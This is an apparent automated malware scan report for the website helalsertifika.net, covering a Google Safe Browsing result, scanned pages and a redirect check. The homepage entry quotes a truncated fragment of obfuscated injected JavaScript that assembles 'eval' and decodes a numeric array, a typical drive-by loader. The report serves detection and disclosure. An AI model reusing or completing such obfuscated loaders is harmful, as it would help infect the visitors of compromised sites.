Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=helalsertifika.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://helalsertifika.net/ | 200 OK Content-Length: 19732 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){w={a:window}.a;v="e".concat(v);}}e=w[""+v];if(1){f=new Array(102,116,108,99,115,103,111,109,30,110,100,118,116,81,95,110,99,109,109,77,115,109,97,99,114,39,39,123,9,30,32,31,30,118,96,112,32,103,103,32,60,30,116,103,103,115,45,113,101,100,98,32,46,30,116,103,103,115,45,79,59,9,30,32,3 ...[3550 bytes skipped]... Antivirus reports:
| ||
http://helalsertifika.net/test404page.js | 403 Forbidden Content-Length: 609 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: helalsertifika.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Sep 2014 16:22:40 GMT
Server: LiteSpeed
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.helalgidabelgesi.gen.tr/xmlrpc.php
GET / HTTP/1.1
Host: helalsertifika.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Sep 2014 16:22:40 GMT
Server: LiteSpeed
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.helalgidabelgesi.gen.tr/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: helalsertifika.net
Referer: http://www.google.com/search?q=helalsertifika.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: helalsertifika.net
Referer: http://www.google.com/search?q=helalsertifika.net
Result:
The result is similar to the first query. There are no suspicious redirects found.